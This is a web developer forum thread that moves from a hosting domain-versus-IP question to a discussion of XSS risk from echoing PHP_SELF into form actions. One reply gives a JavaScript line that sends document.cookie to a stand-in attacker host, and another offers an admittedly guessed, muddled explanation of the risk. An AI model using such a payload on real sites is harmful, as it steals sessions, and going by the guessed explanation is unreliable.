DNS and IP question

Ye' old general discussion board. Basically, for everything that isn't covered elsewhere. Come here to shoot the breeze, shoot your mouth off, or whatever suits your fancy.
This forum is not for asking programming related questions.

Moderator: General Moderators

Post Reply
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

DNS and IP question

Post by alex.barylski »

I just purchased a new shared host and did so by using some fake domain (something.com or something...) and my hosting company indeed used that name when they created my hosting account...

Now I don't NEED a domain name just the sahred host and I figured I'd simply use the IP.

Obviously my software doesn't use any hardcoded URL and relys solely on

$_SERVER['PHP_SELF'] or whatever that variable is (I can't remember)...

Whenever I type in my IP addy and click on a link and I get redirected to that stupid domain name and my software doesn't exists on that domain...

Can I get the hosting company to somehow disable that redirect?

Do I have to use a hardcoded URL in place of that variable?

Should I just purchase a domain name and use it???

Cheers :)
User avatar
R4000
Forum Contributor
Posts: 168
Joined: Wed Mar 08, 2006 12:50 pm
Location: Cambridge, United Kingdom

Post by R4000 »

you have 4 options:
(I recommend 2 :))
  • Hardcode the IP.
    Get a new host with a real domain.
    Buy the domain.
    Or ask your hosting company to give you a subdomain of their domain.
User avatar
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

A domain name maps to an IP (or at least one which will redirect to a shared IP's virtual host). Check you actually have your own dedicated IP for your account. It's not a given and may require a small additional charge.

$_SERVER['PHP_SELF'] - make sure you filter this ;)
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

You can get a ton of free (sub) domains... eg: no-ip.info
User avatar
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA
Contact:

Post by Bill H »

$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

Post by alex.barylski »

Bill H wrote:
$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...

I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...

If I am right, however, I still fail to see why anyone would do such a thing...

It's not like spoofing IP addresses when trying to avoid IP ban scripts or FORM submition when a web site only uses Javascript validation...

So yes, i'm curious too...why and when would you filter that server variable??? :?
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

Hockey wrote:
Bill H wrote:
$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...

I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

Post by alex.barylski »

timvw wrote:
Hockey wrote:
Bill H wrote: Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...

I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
Ahhhhhhh...ok...well thats valid 8)

However, my CMS application is, at current time for a single user only and "every" action requires at least basic authentication - not incredibly secure, but given the circumstances it should be good enough.

Thanks for that heads up though, never even considered that before :)

Cheers :)
User avatar
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA
Contact:

Post by Bill H »

The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

Post by alex.barylski »

Bill H wrote:
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
I'm no expert in web security, but...

I'm guessing PHP_SELF is initialized by looking at the script name stored in HTTP headers...

So I imagine that using SCRIPT_NAME or __FILE__ or something similiar would be better, because their likely initialized on the server, by the server, using environment variables, preventing outside tampering...

Would be my guess anyways... :P

I'm not totally clear on how XSS works, but i'm pretty sure it works like:

You use a variable like: PHP_SELF inside FORM elements action attribute.

You don't hardcode the URL but simply do...

Code: Select all

<form action="<?=$_SERVER['PHP_SELF'];?>">
 <!-- ...various input elements, etc... -->
</form>
Someone could potentially use your web site now to carry out DoS attacks on another site...

All they would have to do is spoof PHP_SELF to something like: http://www.somedomain.com and submit that web site FORM which would send an HTTP GET/POST request to http://www.somedomain.com instead of the intended website...

http://www.somedomain.com would then have a log of your web site sending abnormal amounts of requests to their web site, mean while you haven't done F' all but still get in trouble...and the script kiddy walks because he spoofs his own IP when calling your troubled script...

This is what I am guessing anyways...

If a script kiddy found enough sites with holes like this they could then possibly carry out DDoS attacks...which is more of a threat...

So I guess comparing PHP_SELF to SCRIPT_NAME or hardcoding a URL and just appending PHP_SELF to it would likely fix that problem...

Of course this is all an educated guess...so if I'm wrong someone jump in and correct me...

I'm curious :)

p.s-www.codeproject.com was hacked by a javascript programmer...the message forums allowed javascript and somehow someone figured out how get a script to execute when their message was displayed...so they changed the URL's of the adBanners to some pornographic ad banners instead...whenever someone read their message or entire thread I think it was :P

Bored or what??? Who thinks of these things 8)
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

I found the comments in http://shiflett.org/archive/98 quite informative...

Anyway, the easiest exploit i can think of is a simply injection some javascript like this:

Code: Select all

window.location = 'http://evil.example.org/attack.php?cookie=' + document.cookie 
Now attack.php knows the session_id and can easily perform actions on behalf of the victim.

feyd | fixed to [syntax] tag
User avatar
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA
Contact:

Post by Bill H »

Okay, now I'm going to the head of the "stupid" class, because I still don't have any idea of what is involved in filtering $_SERVER['PHP_SELF'].

Something about comparing it to the the script it's running in... If I can do that, why do I need it at all? I'll just use the script name, right?

I have a form in a script that is going to be used by (included in) several different other scripts, thereby becoming part of the script that included it. Obviously, the <form> tag needs a differing "action" depending on the script that called it. It seems that $_SERVER['PHP_SELF'] is pretty much the obvious choice for that purpose, but you say I then need to "filter" that. Where do I filter it, what is meant by filtering it, and how do I go about doing it?
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

It may be best to split this thread apart, one for PHP_SELF, and the rest stay. Anyone disagree?
User avatar
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA
Contact:

Post by Bill H »

Well, that was very polite, considering that I have brutally hijacked the thread about six nautical miles away from the original topic. It was not deliberate. Hmmm. PHP Code perhaps? I'll post it there.
Post Reply